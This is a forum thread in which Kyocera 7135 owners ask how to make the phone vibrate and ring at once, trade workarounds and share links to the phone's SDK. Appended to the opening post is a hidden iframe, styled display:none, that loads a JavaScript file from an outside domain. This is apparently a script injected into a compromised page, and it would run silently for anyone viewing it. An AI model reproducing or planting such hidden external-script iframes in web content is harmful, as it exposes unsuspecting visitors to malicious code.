+ Reply to Thread

Vibrate/Ring...at the same time?

The 7135 has three ring settings (that I know of): (1) ring; (2) vibrate; (3) vibrate then ring.

I want the phone to vibrate and ring at the same time. Am I s.ol.? Or is there a hack for the 7135 that will accomplish this?

Thanks.

Eric<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm not aware of one. Just the three options you mentioned. I personally use "vibrate, then ring".
    ~'kito
    pdaPhoneHome Moderator

Someone Please Hack this!

This is an otption that I loved about my Nokia 8260. I never missed a call and disturbed fewer folks with a vibrate AND ring option where the ring escalated in volume.

Best phone ever! Still needs some tweek'n.

Are there hacks for this???

This is a feature I dearly miss from my Samsung A460. If this can be hacked, please do so, or if there's a guide to hacking the 7135, I'd be interested in giving it a try. Thanks!!!

Why not just set the phone to the vibrate then ring setting...create a ring tone that gets louder the longer it rings - Problem solved using a lower tech solution

Originally posted by Islander
    Why not just set the phone to the vibrate then ring setting...create a ring tone that gets louder the longer it rings - Problem solved using a lower tech solution
    The problem is that VZW will send the call to voice mail, usually before the phone gets done with the vibrating part.

-Quick

Call verizon's no help desk and ask them to increase the amount of rings before it goes to voice mail. I know that they can do this as they did it for me. vibe then ring is my primary setting, never miss a call due to not answering it in time. which is an accomplishment being that the wife says I am mentally challanged " if it wasn't for that stupid phone you would forget your way home at night"

Unfortunately not all areas are able to adjust the number of rings before voice mail.

I personally really don't like vibrate - then ring. I like to hear my phone ring right away, but if I'm in a noisy environment, I like to feel it vibrate so I don't miss the call. Any 7135 phone hackers out there? Any resources for 7135 phone hacking? I'd still like to give it a try, if someone could point me to a good resource.

Originally posted by Epicsnackus
    I personally really don't like vibrate - then ring. I like to hear my phone ring right away, but if I'm in a noisy environment, I like to feel it vibrate so I don't miss the call. Any 7135 phone hackers out there? Any resources for 7135 phone hacking? I'd still like to give it a try, if someone could point me to a good resource.
    Here is the link to the 7135 SDK.

http://www.kyocera-wireless.com/part...k_download.htm

I haven't looked to see if you could do this hack. I know you can detect an incoming call and take actions based on it.

If you are succesful, I would pay for your application...

Alan

Originally posted by alanb
    If you are succesful, I would pay for your application...
    So would I. I also used to have the Nokia 8260, which rang/vibrated at the same time, and it came in handy often enough that I would like to have that feature back
    Please visit my picture site: Robert-O-Rama :)

that sdk was for the 6035 try this one:
    7135 SDK

I will give this a shot also

Originally posted by PNYPWR76
    that sdk was for the 6035 try this one:
    7135 SDK

I will give this a shot also
    Whoops, sorry, copied the wrong link from my bookmarks...

Alan

When I set it to vibrate/ring, the phone will only vibrate....does it work like that for others?

Originally posted by stu2332
    When I set it to vibrate/ring, the phone will only vibrate....does it work like that for others?
    Mine works as I would expect it to, it vibrates, then rings.
    I have heard most other users comment theirs works the same way.
    -Data Rox